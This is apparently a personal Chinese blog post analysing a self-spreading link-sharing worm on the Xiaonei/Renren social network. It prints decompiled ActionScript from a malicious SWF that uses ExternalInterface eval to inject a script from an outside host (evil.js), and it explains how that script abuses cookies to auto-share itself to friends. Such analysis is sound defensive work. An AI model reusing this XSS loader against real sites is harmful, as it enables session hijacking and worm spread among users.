晚上很晚~11点半才回来,洗漱完毕都12点多了,本来想关电脑就睡觉,谁知道校内还在挂着,习惯性刷新了一下,呵,好几个哥们的状态都是校内有毒,千万别打开个什么视频分享贴,嘿,早就听所校内BUG多,这回我倒要亲自看看了,点开站内信,果然一位好友个我分享了一个视频:
Wish You Were Here @ 2016.
Pink Floyd - Wish You Were Here
http://www.tudou.com/programs/view/PgquuM_LGMs/
嘿,这不是土豆吗?有毒吗?习惯性将那视频的地址复制一下再开一个浏览窗口打开,说我flash的版太低,郁闷,更新一下,打开了,放的还挺流畅的嘛!!这个有毒?不管三七二十一,用工具把那个视频flv个下回来分析,结果扫描,测试了半天,没有嵌入什么恶意代码之类的啊—嗯,看来不是土豆网的问题吧!!嗯--去看看那封信页面的源代码,哇靠,头大,没有专业代码浏览器可真够费劲,算了,直接看信内容部分,呵,其中链接点击动作的代码引起了我的注意:
onclick="playswf(0,'http://o.99081.com/xnxss/1.swf',1.22)
99081.com,嘿这不是号称国内最大的免费空间网站,常来网免费空间吗?这里的一个flash嵌到校内信上的点击动作肯定没好戏,游戏开始咯,把那个1.swf下回来,扫描一下,貌似没有恶意代码,把它仍到虚拟机里用IE打开也没什么动静,看的得抄家伙了,用swf反编译器Sothink SWF Decompiler4.4打开它,在源代码部分可以看到:
//
Action script...
// [Action in Frame 1]
var fun = "var x=document.createElement(/"SCRIPT/");x.src=/"http://n.99081.com/xnxss1/evil.js/"; x.defer=true;document.getElementsByTagName(/"HEAD/")[0].appendChild(x);";
flash.external.ExternalInterface.call("eval", fun);
loadMovie("http://www.tudou.com/player/outside/player_outside.swf?iid=4120048&default_skin=http://js.tudouui.com/bin/player2/outside/Skin_outside_13.swf&autostart=false&rurl=",
this);
好家伙藏在http://n.99081.com/xnxss1/evil.js这里,看来快要到事情真相了,嘿,把evil.js下回来,打开一看我服了,第一句:
// I'm not a malicious worm.^^;
我哭笑不得,家伙我折腾老半天就为这个啊~太不值了吧,不过总算真相大白,往下大概看了几眼,这个js还算简单,确实不带恶意性,大概原理是利用Cookies的特性获得好友资料再通过一个开关语句执行http://share.renren.com/share/submit.do来实现好友共享的,所以当大家点这个swf时也就理所当然的自动共享咯---所以所到头来这就是一次恶作剧---目前没有什么危害性,当然这代码要再改改,那就不一样了,不过违不违法也在此一举之别——校内出这么大的漏子实不该啊,按理说这种攻击手段都算是跨站脚本攻击了,万恶之源就看校内怎去整治了,建议大家能不打开那东西就不打开吧,打开了也不用害怕,目前确实没什么恶意行为,当然我也是大概分析了一下,高手们可以继续深入细节研究(有不妥的地方请高手指正!)。
个人分析不是很全面,只是分析了大概原理,涉及到的有关怎调用和操作其中flash中有关的属性以及怎利用漏洞都没有进行分析,各位干兴趣可以进一步分析!